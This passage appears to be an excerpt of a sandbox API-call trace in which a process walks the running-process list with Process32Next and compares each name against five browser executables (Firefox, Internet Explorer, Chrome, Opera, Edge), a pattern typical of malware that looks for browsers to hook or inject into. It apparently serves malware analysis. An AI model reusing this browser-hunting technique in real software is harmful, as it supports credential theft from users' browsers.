lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.921] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0218.921] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0218.921] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0218.921] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0218.921] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.921] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.921] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0218.921] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0218.921] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0218.921] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0218.921] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.921] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.922] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0218.922] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0218.922] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0218.922] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0218.922] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.922] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.922] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.922] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.922] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.922] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.922] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.922] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.923] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0218.923] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0218.923] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0218.923] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0218.923] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.923] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0218.924] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0218.924] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0218.924] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0218.924] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0218.924] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0218.924] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0218.924] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0218.924] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0218.924] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0218.924] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0218.925] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0218.925] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0218.925] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0218.925] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0218.925] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.925] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0218.926] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0218.926] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0218.926] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0218.926] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0218.926] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0218.926] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0218.926] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0218.926] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0218.926] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0218.926] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0218.927] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0218.927] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0218.927] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0218.927] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0218.927] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0218.927] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0218.927] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0218.927] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0218.927] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0218.927] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0218.928] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0218.928] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0218.928] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0218.928] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0218.928] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.928] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0218.929] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0218.929] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0218.929] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0218.929] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0218.929] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0218.929] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0218.929] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0218.929] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0218.929] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0218.929] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0218.930] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0218.930] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0218.930] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0218.930] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0218.930] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0218.930] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0218.930] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0218.930] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0218.930] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0218.930] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0218.931] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0218.931] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0218.931] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0218.931] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0218.931] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0218.931] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0218.932] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0218.932] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0218.932] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0218.932] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0218.932] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0218.932] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0218.932] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0218.932] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0218.932] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0218.933] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0218.933] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0218.933] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0218.933] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0218.933] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0218.933] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0218.933] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0218.933] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0218.933] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0218.933] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0218.934] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0218.934] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0218.934] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0218.934] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0218.934] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0218.934] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0218.935] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0218.935] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0218.935] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0218.935] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0218.935] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0218.935] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0218.935] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0218.935] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0218.935] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0218.936] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0218.936] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0218.936] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0218.936] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0218.936] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.936] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0218.936] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0218.936] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0218.936] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0218.936] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.937] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.937] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.937] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.937] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.937] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0218.937] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0218.938] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0218.938] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0218.938] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0218.938] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.938] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.938] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.938] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.938] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.938] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.939] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0218.939] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0218.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0218.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0218.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.988] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.988] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.988] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.988] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0218.988] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.989] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0218.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0218.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0218.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0218.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.989] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.990] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0218.990] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0218.990] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0218.990] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0218.990] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.990] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.990] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.990] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.990] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0218.990] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, 